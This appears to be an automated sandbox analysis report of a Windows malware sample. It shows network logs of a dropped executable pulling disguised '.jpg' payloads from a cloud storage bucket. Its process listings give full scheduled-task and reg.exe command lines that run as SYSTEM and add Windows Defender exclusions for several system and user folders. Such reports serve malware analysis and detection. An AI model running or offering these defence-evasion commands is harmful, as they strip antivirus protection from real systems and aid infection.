                                              2025-01-05 09:12:35 UTC | 115 | OUT | GET /FOM-52.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:35 UTC | 547 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:35 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 5062442
                                              Connection: close
                                              x-oss-request-id: 677A4D03716A9C3036FB706C
                                              Accept-Ranges: bytes
                                              ETag: "70C21DA900796B279A09040B00953E40"
                                              Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 360383310743409046
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                              x-oss-server-time: 13


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.6 | 62786 | 118.178.60.94 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:12:46 UTC | 115 | OUT | GET /FOM-53.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:46 UTC | 547 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:46 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 366410
                                              Connection: close
                                              x-oss-request-id: 677A4D0EA966993036C402AA
                                              Accept-Ranges: bytes
                                              ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                              Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 5641369857548672686
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                              x-oss-server-time: 61



                                              Target ID:0
                                              Start time:04:10:37
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
                                              Imagebase:0x140000000
                                              File size:30'883'840 bytes
                                              MD5 hash:934C8C307939CD29F7D1D434F1AD09EF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:04:11:39
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Documents\EMp3o1.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Documents\EMp3o1.exe
                                              Imagebase:0x140000000
                                              File size:133'136 bytes
                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:04:12:01
                                              Start date:05/01/2025
                                              Path:C:\Users\user\Documents\EMp3o1.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Documents\EMp3o1.exe
                                              Imagebase:0x140000000
                                              File size:133'136 bytes
                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:8
                                              Start time:04:12:12
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:04:12:12
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:18
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:22
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:23
                                              Start time:04:12:13
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:24
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:25
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:26
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:27
                                              Start time:04:12:14
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:28
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:29
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:30
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:31
                                              Start time:04:12:15
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:32
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:33
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:34
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:35
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Run /TN "Task1"
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:36
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff6feb80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:37
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:38
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                              Imagebase:0x7ff7e3d40000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:39
                                              Start time:04:12:16
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\reg.exe
                                              Wow64 process (32bit):false
                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                              Imagebase:0x7ff602f00000
                                              File size:77'312 bytes
                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:40
                                              Start time:04:12:47
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:false

                                              Target ID:41
                                              Start time:04:12:49
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:42
                                              Start time:04:12:50
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              Target ID:43
                                              Start time:04:12:51
                                              Start date:05/01/2025
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c echo.>c:\xxxx.ini
                                              Imagebase:0x1c0000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:44
                                              Start time:04:12:51
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:45
                                              Start time:04:12:52
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:46
                                              Start time:04:13:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
                                              Imagebase:0x1f0000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:47
                                              Start time:04:13:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
                                              Imagebase:0x710000
                                              File size:54'152 bytes
                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:2.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:32%
                                                Total number of Nodes:462
                                                Total number of Limit Nodes:7

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: File$CreateReadmalloc
                                                • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                • API String ID: 3950102678-3381721293
                                                • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
